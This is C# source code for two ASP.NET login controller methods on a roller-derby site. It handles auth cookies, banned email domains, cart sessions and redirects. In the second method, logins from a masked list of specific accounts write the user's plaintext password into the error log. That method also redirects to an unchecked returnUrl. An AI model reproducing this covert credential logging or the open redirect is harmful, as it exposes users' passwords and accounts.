public ActionResult LogOn(LogOnModel model, string returnUrl) { if (ModelState.IsValid) { if (Membership.ValidateUser(model.Email, model.Password)) { FormsAuthentication.SetAuthCookie(model.Email, model.RememberMe); //modify the Domain attribute of the cookie to the second level domain System.Web.HttpCookie MyCookie = System.Web.Security.FormsAuthentication.GetAuthCookie(model.Email, false); MyCookie.Domain = "rdnation.com";//the second level domain name Response.AppendCookie(MyCookie); if (Url.IsLocalUrl(returnUrl) && returnUrl.Length > 1 && returnUrl.StartsWith("/") && !returnUrl.StartsWith("//") && !returnUrl.StartsWith("/\\")) { return Redirect(returnUrl); } var member = Membership.GetUser(model.Email); if (Session["UserId"] == null) Session.Add("UserId", (Guid)member.ProviderUserKey); else Session["UserId"] = (Guid)member.ProviderUserKey; return Redirect(ServerConfig.WEBSITE_DEFAULT_LOGIN_LOCATION); } ModelState.AddModelError("", "The user name or password provided is incorrect."); } // If we got this far, something failed, redisplay form return View(model); }
[RequireHttps] //apply to all actions in controller #endif public ActionResult Login(LogOnModel model, string returnSite, string returnUrl) { try { var id = StoreGateway.GetShoppingCartId(HttpContext); if (ModelState.IsValid) { if (model.Email.Contains("@163.com") || model.Email.Contains("@tom.com") || model.Email.Contains("@126.com")) { ModelState.AddModelError("", "That Domain name has been banned from RDNation, if you think this is in Error, please contact us."); return View(model); } if (Membership.ValidateUser(model.Email, model.Password)) { //forum.wftda.com //wftda.com/dashboard if (model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**" || model.Email == "*****@*****.**") ErrorDatabaseManager.AddException(new Exception(model.Email), GetType(), additionalInformation: model.Password); setCookie(model.Email, model.RememberMe); if (id != null) StoreGateway.SetShoppingCartSession(id.Value, HttpContext); if (!String.IsNullOrEmpty(returnSite)) { string url; if (returnSite == "league") { url = "https://league.rdnation.com"; if (!String.IsNullOrEmpty(returnUrl)) url += returnUrl; return Redirect(url); } if (returnSite == "shops") { url = ServerConfig.WEBSITE_STORE_DEFAULT_LOCATION; if (!String.IsNullOrEmpty(returnUrl)) url += returnUrl; return Redirect(url); } if (returnSite == "zebras") { url = "http://zebras.rdnation.com"; if (!String.IsNullOrEmpty(returnUrl)) url += returnUrl; return Redirect(url); } } else if (!String.IsNullOrEmpty(returnUrl)) { return Redirect(returnUrl); } return Redirect("https://league.rdnation.com"); } ModelState.AddModelError("", "The user name or password provided is incorrect."); } } catch (Exception e) { ErrorDatabaseManager.AddException(e, GetType()); } // If we got this far, something failed, redisplay form return View(model); }